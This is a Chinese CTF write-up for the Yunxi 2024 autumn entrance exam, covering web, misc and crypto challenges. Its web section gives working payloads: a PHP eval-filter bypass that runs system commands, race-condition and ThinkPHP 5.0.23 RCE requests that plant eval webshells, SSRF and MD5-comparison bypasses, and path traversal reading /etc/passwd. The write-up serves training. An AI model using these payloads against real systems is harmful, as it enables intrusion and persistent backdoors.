当前位置: 首页 > article >正文

云曦2024秋季学期开学考复现

Web

学习高数

资料:命令执行中关于PHP正则表达式的一些绕过方法_正则表达式中过滤的怎么绕过-CSDN博客

记 [CISCN 2019 初赛]Love Math三种解法-CSDN博客

WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘_代码执行 异或绕过-CSDN博客

浅谈PHP代码执行中出现过滤限制的绕过执行方法_php过滤绕过-CSDN博客

1.根据提示,有10000个页面,index1.html...,并且经过测试发现几乎所有的页面回显的内容都一样,这个时候就会想到会不会有不同页面的情况

2.这里使用bp进行爆破,发现8887页面的回显内容不一样

3.访问cvFXZohgjf这个文件,得到php代码,接下来就是代码审计

 <?php
error_reporting(0);
//你的高数怎么样
if(!isset($_GET['GS'])){
    show_source(__FILE__); //这部分代码检查URL参数GS是否已设置。如果没有设置,它将使用show_source()函数显示当前文件的源代码
}else{
    //例子 GS=20-1
    $content = $_GET['GS'];
    if (strlen($content) >= 60) {
        die("不是哥们"); //代码首先获取GS参数的值,并检查其长度是否小于60个字符。如果长度超过或等于60个字符,则脚本终止并显示消息“不是哥们”。
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("新号别搞");
        }//代码定义了一个黑名单,包含了一系列不允许在GS参数中出现的字符。然后,它遍历这个黑名单,使用正则表达式检查$content中是否包含这些字符。如果找到任何黑名单中的字符,脚本将终止并显示“新号别搞”。
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh',  'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("虾啊");
        }//代码定义了一个白名单,包含了一系列允许在GS参数中使用的PHP数学函数。然后,它使用正则表达式提取$content中所有可能的函数名,并将这些函数名与白名单进行比较。如果$content中包含任何不在白名单中的函数,脚本将终止并显示“虾啊”。
    }
    eval('echo '.$content.';'); //最后,如果通过了所有安全检查,代码将使用eval()函数执行$content中的PHP代码,并通过echo输出执行结果。
}

要求:

1.字符长度
2.过滤字母、部分特殊符号,注意这里虽然过滤了部分字符,但是没有过滤^,所以我们可以异或取反创造我们想要的字母
3.绕过preg_match_all

4.既然没有ban ^符号,那么我们就可以通过异或构造想要的字母

给出脚本:

<?php
$payload = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh',  'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
for($k=1;$k<=sizeof($payload);$k++){
    for($i = 0;$i < 9; $i++){
        for($j = 0;$j <=9;$j++){
            $exp = $payload[$k] ^ $i.$j;
            echo($payload[$k]."^$i$j"."==>$exp");
            echo "\n";
        }
    }
}

5.构造payload,得到flag

?GS=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat /flag

你能跟上我的speed吗

资料:第二个资料是使用的方法,比较有用

文件上传-条件竞争-DoraBox_12333119的技术博客_51CTO博客

1. 经过测试,发现文件上传之后得到的都是同一张图片,根据题目的意思,发现是和速度有关,想到文件上传类型中的条件竞争,上传文件写入一句话木马:

<?php $op=fopen("shell.php","a+");fwrite($op,'<?php @eval($_POST[cmd]);?>');fclose($op);echo(333) ?>
使用fopen函数以追加模式("a+")打开名为"shell.php"的文件。
如果文件不存在,将会创建该文件。
"a+"模式意味着文件指针会放在文件的末尾,用于追加内容,但也可以读取文件。
使用fwrite函数向打开的文件中写入PHP代码。
这段代码是一个简单的PHP后门,它使用eval函数执行通过POST请求发送的名为"cmd"的参数的内容。
@符号用于抑制错误消息的显示,即使执行了非法的PHP代码,也不会在输出中显示错误信息。
使用fclose函数关闭文件指针。

 2.抓包上传文件的请求并发送到intruder

3.抓包访问上传文件的路径

4.两处的payload type都设为null payloads,payload setting选择Continue indefinitely(无限循环抓包)

 5.两边同时爆破,在文件上传路径页面爆到显示333页面停止

6.发送到repeater,更改1.php为shell.php

7.最后使用蚁剑连接,成功连接

8.找到flag

ezezssrf

1.进入页面是php代码,进行代码审计

一共有四个地方需要绕过:

第一处:md5的弱比较绕过,使用数组绕过

yunxi[]=1&wlgf[]=2

第二处:强制转换成字符串型的md5的强比较绕过

参考:md5强比较&弱比较-CSDN博客

第三处:ssrf的相关绕过(@)

GLG=http://blog.csdn.net@127.0.0.1

第四关:无回显的RCE,tee命令

cmd=cat /flag | tee 1.txt

2.构造payload

yunxi%5B%5D=1&wlgf%5B%5D=2&yunxii=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&wlgff=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2&GLG=http://blog.csdn.net@127.0.0.1&cmd=cat /flag | tee 1.txt

 3.抓包进行传参

4.页面访问这个txt文件,得到flag

小小py

资料:任意文件下载、文件读取_poc-yaml-hanming-video-conferencing-file-read wind-CSDN博客

Web漏洞-任意文件读取漏洞-CSDN博客

任意文件读取漏洞的利用指南 - 简书

[第一章 web入门]afr_3_ctfhub web afr-3-CSDN博客

考查:任意文件读取、session伪造、目录穿越

1.打开页面,题目的大致意思是我有1336金币,买flag需要1337金币,点击上面的大图,会直接下载图片

2.用bp抓包,发现图片的下载路径

3.尝试任意文件读取,../../../../etc/passwd
如果存在回显,则代表该网站存在任意文件读取漏洞

4.接着查看当前进程运行的环境变量/proc/self/environ,得到flag

真正的hacker!(flag1) (flag2)

资料:https://www.cnblogs.com/arrest/articles/17515491.html

1.打开页面,发现有ThinkPHP V5的字样

2.一般遇到ThinkPHP框架,就要搜索相关的版本的漏洞,传参?s=1,出现具体的版本,5.0.23,那么就搜索相关版本的漏洞,发现是远程代码执行漏洞

3.get传参?s=captcha,post传参,查看系统信息以及使用的相关命令

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

但是我们要知道文件写到哪里,先pwd查看下目录:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

注意:这里ls,发现可疑的uploads,刚好这里涉及到远程代码执行漏洞

4.查看根目录,发现flag1

5.获得flag1

 6.发现页面提示如果要得到第二个flag,就要进行getshell,既然知道了路径,又可以写了一个文件,于是就写入webshell ,但是发现页面报错

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo <?php @eval($_POST['cmd']); ?>  >>/var/www/public/shell.php

7.发现行不通,可能是什么东西被过滤了,试试base64的,发现蚁剑连接,连接成功

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" |base64 -d > /var/www/public/uploads/shell.php

8.这样可以找到两个flag

文件上传

参考:SUCTF2019 upload-lab2

云曦2024秋季开学考-CSDN博客

1.首先在admin.php中找到有关flag的地方

2.很明显要触发__wakeup()魔术方法,触发__wakeup()就需要触发反序列化

misc 

misc1

1.解压之后得到pcap文件,发现一个长度规律,两个稍微比较长的会夹着一个比较短的

2.追踪数据流,发现长度短的隐藏着flag的信息

3.将含有信息的追踪流拼接在一起,得到flag

flag{7823yed-3892hu-7euiwb-euwidbh82-7ueidw}

misc大杂烩

第一部分(盲水印)

flag1{hdy12- 

第二部分(word隐藏文字)

打开需要查找隐藏内容的word文档,按【Ctrl+A】全选文档,然后单击鼠标右键,点击【字体】,打开“字体”对话框。在“字体”对话框中,将“效果”栏下的【隐藏】取消勾选,然后点击【确定】,这样文档中隐藏的文字就全部取消隐藏状态并显示出来了,且可以在打印中显示出来,方法很多,可自行查找 

flag2{1yhgzc5- 

第三部分(文件头修改+base64转图片) 

拖进010editer中发现是base64编码,这个时候想到base64转图片

解码之后是一张二维码

解这个二维码

 flag3{Ypt0a2-

第四部分(Deepsound音频隐写

flag4{ghj8- 

第五部分(掩码爆破+埃特巴什码解密)

发现第五部分加密,用密码解密,把掩码进行爆破

成功打开文件

这个是埃特巴什码解密

flag5{7ugak- 

考点6(文件16进制颠倒)

用winhex打开,发现里面的字符反过来可以正常阅读,所以文件被倒置了,利用python进行倒置回来

相关脚本:

with open("原文件位置","rb") as fs:
    with open("flag","wb") as f:
        f.write(fs.read()[::-1])

将文件改成zip文件,得到第六部分

Flag6: 78uiag}

Yunxi{hdy12-1yhgzc5-Ypt0a2-ghj8-7ugak-78uiag}Yunxi{hdy12-1yhgzc5-Ypt0a2-ghj8-7ugak-78uiag}

misc2

Crypto

mmmd5

1.打开txt文件,发现一个规律,每一串数字用md5解出来就是flag,可以直接一个一个找,也可以写脚本,进行解码

大佬的payload:

import hashlib
 
# 给定的 MD5 哈希值列表
output = ['0d61f8370cad1d412f80b84d143e1257', 'b9ece18c950afbfa6b0fdbfa4ff731d3', '800618943025315f869e4e1f09471012', 'f95b70fdc3088560732a5ac135644506', '0cc175b9c0f1b6a831c399e269772661', 'a87ff679a2f3e71d9181a67b7542122c', '92eb5ffee6ae2fec3ad71c777531578f', '8fa14cdd754f91cc6554c9e71929cce7', 'a87ff679a2f3e71d9181a67b7542122c', 'eccbc87e4b5ce2fe28308fd9f2a7baf3', '0cc175b9c0f1b6a831c399e269772661', 'e4da3b7fbbce2345d7772b0674a318d5', '336d5ebc5436534e61d16e63ddfca327', 'eccbc87e4b5ce2fe28308fd9f2a7baf3', '8fa14cdd754f91cc6554c9e71929cce7', '8fa14cdd754f91cc6554c9e71929cce7', '45c48cce2e2d7fbdea1afc51c7c6ad26', '336d5ebc5436534e61d16e63ddfca327', 'a87ff679a2f3e71d9181a67b7542122c', '8f14e45fceea167a5a36dedd4bea2543', '1679091c5a880faf6fb5e6087eb1b2dc', 'a87ff679a2f3e71d9181a67b7542122c', '336d5ebc5436534e61d16e63ddfca327', '92eb5ffee6ae2fec3ad71c777531578f', '8277e0910d750195b448797616e091ad', '0cc175b9c0f1b6a831c399e269772661', 'c81e728d9d4c2f636f067f89cc14862c', '336d5ebc5436534e61d16e63ddfca327', '0cc175b9c0f1b6a831c399e269772661', '8fa14cdd754f91cc6554c9e71929cce7', 'c9f0f895fb98ab9159f51fd0297e236d', 'e1671797c52e15f763380b45e841ec32', 'e1671797c52e15f763380b45e841ec32', 'a87ff679a2f3e71d9181a67b7542122c', '8277e0910d750195b448797616e091ad', '92eb5ffee6ae2fec3ad71c777531578f', '45c48cce2e2d7fbdea1afc51c7c6ad26', '0cc175b9c0f1b6a831c399e269772661', 'c9f0f895fb98ab9159f51fd0297e236d', '0cc175b9c0f1b6a831c399e269772661', 'cbb184dd8e05c9709e5dcaedaa0495cf']
 
# 常见字符及其 MD5 哈希值的字典
common_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_{}-"
md5_dict = {hashlib.md5(char.encode()).hexdigest(): char for char in common_chars}
 
# 还原原始字符串
flag = ''.join(md5_dict.get(md5_hash, '?') for md5_hash in output)
 
print("Flag:", flag)

babycrypto

原题:https://blog.csdn.net/2301_82327951/article/details/138328929

本质就是将flag转二进制再用0填充,得到514位加密后二进制串,再将二进制翻转后进行加密程序custom_add,最后直接输出结果。

加密程序是按位置值进行加法后取模,于是反向得到解密方案即按位加上(10-位置值)后再对10取模,接着利用现成的翻转函数,从而得到填充后的二进制数。不确定填充了多少0,保险起见手动从最后一个1开始去0再转字节型字符串,若不成功就加一位0,不过不需要加。

from Crypto.Util.number import *
from tqdm import *

b = 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567891134567799012455779902334677900124556899012356679001344567990233457780113445788911245667991134457799122355788001245578890223467799013445688902335578800123457889113346778902344567991223557880013355689911245667900124556789122355788001234678891133467799023445679902334568900123556899012456679001344578801233467789112355779912234577990233556780113
c = list(map(int,str(b)))

#part1 reverse custom
for i in range(len(c)):
    c[i] = (c[i] - 1 - i) % 10

#part2 recover swap
for i in range(len(c)//2):
    temp = c[i]
    c[i] = c[511-i]
    c[511-i] = temp


#part3 get flag
flag = "0" + "".join(list(map(str,c)))[:-1]
print(long_to_bytes(int(flag,2)))


http://www.kler.cn/a/307375.html

相关文章:

  • SpringMVC学习笔记(二)
  • 【VIM】vim 常用命令
  • 大模型时代,呼叫中心部门如何自建一套大模型在线客服?
  • Vue 项目打包后环境变量丢失问题(清除缓存),区分.env和.env.*文件
  • Springboot 日志处理(非常详细)
  • C++,STL 054(24.11.13)
  • 【FreeRTOS】任务
  • 项目实现:云备份②(文件操作、Json等工具类的实现)
  • 每日一题——第九十二题
  • Unity Apple Vision Pro 开发(九):空间锚点
  • cJSON-轻量级解析模块、字符串的神——编织STM32C8T6与阿里云信息传递的纽带
  • MAVEN如何导入项目
  • [Web安全 网络安全]-文件读取与下载漏洞
  • Vue、React 生命周期有哪些?页面数据获取放在哪个生命周期做比较好?
  • JAVA语言之Solr的工作原理以及如何管理索引库
  • 【爬虫软件】批量采集抖音主页已发布作品
  • 从零开始学习Linux(12)---进程间通信(信号量与信号)
  • 即插即用!高德西交的PriorDrive:统一的矢量先验地图编码,辅助无图自动驾驶
  • PHP环境搭建详细教程
  • 基于kolla-ansible在openEuler 22.03 SP4上部署OpenStack-2023.2
  • 二叉树和堆概念
  • C++ 科目二 智能指针 [weak_ptr] (解决shared_ptr的循环引用问题)
  • websocket消息推送修改
  • PostgreSQL的查看主从同步状态
  • 凸优化学习(3)——对偶方法、KKT条件、ADMM
  • 「C++系列」文件和流